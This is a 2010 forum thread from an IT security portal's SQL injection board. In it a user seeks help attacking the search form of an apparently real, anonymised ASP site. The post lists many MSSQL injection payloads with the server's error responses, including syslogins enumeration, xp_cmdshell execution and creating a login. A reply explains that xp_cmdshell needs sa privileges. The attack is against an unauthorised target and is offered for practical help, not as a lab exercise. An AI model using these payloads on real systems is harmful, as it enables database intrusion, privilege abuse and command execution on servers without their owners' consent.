|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 87
Members: 0
Total: 87
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Mssql Injection? |
|
Posted: Mon Jun 28, 2010 6:11 pm |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
Hi..;I m not abel to do something here Cuz it give "No permission" Each time I inject sometime..Damn, Maybe you can help me..I will explain more.
Here is the vuln URL..
Code: | http://www.URL.com/think/search.asp |
I think It should be like that..
Code: | <form action="http://www.URL.com/think/search.asp" method="POST">
<input name="search_keyword" type="text" value="vsat">
<input type="submit" value="Inject !"> |
Look at all thes request and all their error given please..
work!
Code: | vsat'
vsat'/*
vsat')/*
vsat"/*
vsat"-- |
SQL Error!..
Code: | Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.
/think/search.asp, line 91 |
Euh It work here..And it give a normal page as "vsat"..
But I tried with AND/OR/UNION/GROUP BY/ORDER BY/HAVING.. and it didnt work..It give the same SQL error
Code: | vsat' OR 1=1--
vsat' AND 1=1--
vsat' having 1=1-- |
I will post here what they are all injections that worked well, But it give a normal page as "vsat" nothing else..
Code: | vsat'--
vsat' IF (1=1) SELECT 'true' ELSE SELECT 'false'--
vsat' if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0--
vsat' SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC--
vsat' SELECT CHAR(0x66)--
vsat' SELECT 0x5045--
vsat' SELECT 0x50 + 0x45-- |
I tried many many functions..But they give "No permission ..."
Code: | vsat' exec master..xp_cmdshell 'dir'-- |
Code: | Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
/think/search.asp, line 364 |
Code: | vsat' CREATE LOGIN JohnDoe WITH PASSWORD = 'somepassword'--
vsat' RECONFIGURE;--
vsat' CREATE USER WindowsGroup FROM LOGIN WindowsGroup-- |
Code: | Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]User does not have permission to perform this action.
/think/search.asp, line 364 |
SO any answers or help or explanation please share anything with us.. |
|
|
|
|
|
|
|
|
Posted: Wed Sep 01, 2010 1:23 am |
|
|
niailuo |
Beginner |
|
|
Joined: Aug 31, 2010 |
Posts: 2 |
|
|
|
|
|
|
|
you know,you can use exec.master..xp_cmdshell only at the time when you have the SA permission..
maybe it's a db_owner OR public permission. isn't it ?
Okay .hope you can add me ,and my ICQ:613592918.
I'm so sorry ,i can't speak English very well as I'm a Chinese.. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|